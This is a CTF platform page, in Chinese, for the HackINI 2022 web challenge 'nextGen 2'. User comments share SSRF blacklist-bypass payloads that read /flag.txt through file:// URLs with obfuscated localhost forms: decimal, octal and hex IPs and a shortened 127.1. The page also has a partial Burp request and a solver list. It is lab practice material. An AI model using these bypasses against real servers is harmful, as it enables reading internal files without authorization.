nextGen 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: freetstar
一血奖励: 0金币
解  决: 1524
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
We added some filters now.
评论
babydon‘tcry 1月前

没想到随便加个0就绕过了

回复 0

GNMO 8月前

file叫本地文件传输协议file://127.0.0.1/C:/ 本地C盘 file://localhost/D:/ 本地D盘 file:///E:/ 本地E盘

回复 1

Aerelin 10月前

为什么改完包发送依旧拿不到flag

回复 0

bugfuck2 1年前

service=file://127.0.0.01/flag.txt

回复 1

bugku111222 1年前

bp中修改了这些,为什么一直响应400? POST /request HTTP/1.1 Content-Type: application/x-www-form-urlencode service=file:///127.0.1/flag.txt

回复 0
xingzou 5月前

感觉应该是//127.1/flag吧

回复 0

零基础110 1年前

shellmates{**********}

回复 0

2ew123123124 1年前

shellmates{******}

回复 0

lunarbyside 1年前

所以为啥想当然觉得过滤了127.0.0.1啊,怎么想到的,可以过滤的地方多了去了

回复 5

脆脆sha_ 1年前

黑名单过滤的ip地址绕过: 十进制整数表示:2130706433 八进制表示:0177.0.0.1 十六进制表示:0x7f.0x0.0x0.0x1 省略IP的某些部分:127.1

回复 1
divinesh 1年前

niude

回复 0

意大利炮 1年前

service=file://127.00.00.1/flag.txt和service=file://2130706433/flag.txt

回复 4

WriteUp

image
hopeinhand

1 金币

评分(2)

解题动态

vb嘎嘎 攻破了该题 3天前
1mm0rt41 攻破了该题 3天前
写作业ing 攻破了该题 5天前
一刹嫣红 攻破了该题 5天前
洛123 攻破了该题 5天前
晨曦静夜 攻破了该题 5天前
bugbiubiubiu 攻破了该题 6天前
网易杠交运气 攻破了该题 6天前
Zfc 攻破了该题 7天前
btking 攻破了该题 7天前
nnyylove 攻破了该题 7天前
yt430uu 攻破了该题 7天前
乔qiao 攻破了该题 8天前
wzdhsgfagjf 攻破了该题 11天前
风花雪月 攻破了该题 11天前
随性 攻破了该题 11天前
时肆 攻破了该题 11天前
土豆服务 攻破了该题 11天前
lover 攻破了该题 12天前
Max_x 攻破了该题 14天前
问题反馈